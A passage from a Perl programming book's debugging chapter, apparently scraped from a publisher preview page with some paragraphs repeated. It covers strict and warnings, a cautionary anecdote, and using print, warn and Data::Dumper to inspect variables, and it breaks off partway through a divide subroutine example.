The standard Perl distribution comes with a debugger, although it’s really just another Perl program, perl5db.pl. Since it is just a program, I can use it as the basis for writing my own debuggers to suit my needs, or I can use the interface perl5db.pl provides to configure its actions. That’s just the beginning, though. I can write my own debugger or use one of the many debuggers created by other Perl masters.
Before I get started, I’m almost required to remind you that Perl offers two huge debugging aids: strict and warnings. I have the most trouble with smaller programs for which I don’t think I need strict and then I make the stupid mistakes it would have caught. I spend much more time than I should have tracking down something Perl would have shown me instantly. Common mistakes seem to be the hardest for me to debug. Learn from the master: don’t discount strict or warnings for even small .
Now that I’ve said that, you’re going to look for it in the examples in this chapter. Just pretend those lines are there, and the book costs a bit less for the extra half a page that I saved by omitting those lines. Or if you don’t like that, just imagine that I’m running every program with both strict and warnings turned on from the command line:
$ perl -Mstrict -Mwarnings program
Along with that, I have another problem that bites me much more than I should be willing to admit. Am I editing the file on the same machine I’m running it on? I have login accounts on several machines, and my favorite terminal program has tabs so I can have many sessions in one window. It’s easy to checkout source from a repository and work just about anywhere. All of these nifty features conspire to get me into a situation where I’m editing a file in one window and trying to run it in another, thinking I’m on the same machine. If I’m making changes but nothing is changing in the output or behavior, it takes me longer than you’d think to figure out that the file I’m running is not the same one I’m editing. It’s stupid, but it happens. Discount nothing while !
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
Before You Waste Too Much Time
Before I get started, I’m almost required to remind you that Perl offers two huge debugging aids: strict and warnings. I have the most trouble with smaller programs for which I don’t think I need strict and then I make the stupid mistakes it would have caught. I spend much more time than I should have tracking down something Perl would have shown me instantly. Common mistakes seem to be the hardest for me to debug. Learn from the master: don’t discount strict or warnings for even small .
Now that I’ve said that, you’re going to look for it in the examples in this chapter. Just pretend those lines are there, and the book costs a bit less for the extra half a page that I saved by omitting those lines. Or if you don’t like that, just imagine that I’m running every program with both strict and warnings turned on from the command line:
$ perl -Mstrict -Mwarnings program
Along with that, I have another problem that bites me much more than I should be willing to admit. Am I editing the file on the same machine I’m running it on? I have login accounts on several machines, and my favorite terminal program has tabs so I can have many sessions in one window. It’s easy to checkout source from a repository and work just about anywhere. All of these nifty features conspire to get me into a situation where I’m editing a file in one window and trying to run it in another, thinking I’m on the same machine. If I’m making changes but nothing is changing in the output or behavior, it takes me longer than you’d think to figure out that the file I’m running is not the same one I’m editing. It’s stupid, but it happens. Discount nothing while !
That’s a bit of a funny story, but I included it to illustrate a point: when it comes to debugging, Humility is one of the principal virtues of a maintenance programmer.My best bet in debugging is to think that I’m the problem. That way, I don’t rule out anything or try to blame the problem on something else, like I often see in various Perl forums under titles such as “Possible bug in Perl.” When I suspect myself first, I’m usually right. is my guide to solving any problem, which people have found useful for at least figuring out what might be wrong even if they can’t fix it.
Additional content appearing in this section has been removed.
Purchase this book now or read it online at Safari to get the whole thing!
The Best Debugger in the World
No matter how many different debugger applications or integrated development environments I use, I still find that plain ol’ print is my best debugger. I could load source into a debugger, set some inputs and breakpoints, and watch what happens, but often I can insert a couple of print statements and simply run the program normally.I put braces around the variable so I can see any leading or trailing whitespace:
print "The value of var before is [$var]\n";

#... operations affecting $var;

print "The value of var after is [$var]\n";
I don’t really have to use print because I can do the same thing with warn, which sends its output to standard error:
warn "The value of var before is [$var]";

#... operations affecting $var;

warn "The value of var after is [$var]";
Since I’ve left off the newline at the end of my warn message, it gives me the filename and line number of the warn:
The value of var before is [$var] at program.pl line 123.
If I have a complex data structure, I use Data::Dumper to show it. It handles hash and array references just fine, so I use a different character, the angle brackets in this case, to offset the output that comes from Data::Dumper:
use Data::Dumper qw(Dumper);
warn "The value of the hash is <\n" . Dumper( \%hash ) . "\n>\n";
Those warn statements showed the line number of the warn statement. That’s not very useful; I already know where the warn is since I put it there! I really want to know where I called that bit of code when it became a problem. Consider a divide subroutine that returns the quotient of two numbers. For some reason, something in the code calls it in such a way that it tries to divide by zero:
sub divide
        {
        my( $numerator, $denominator ) = @_;

        return $numerator / $denominator;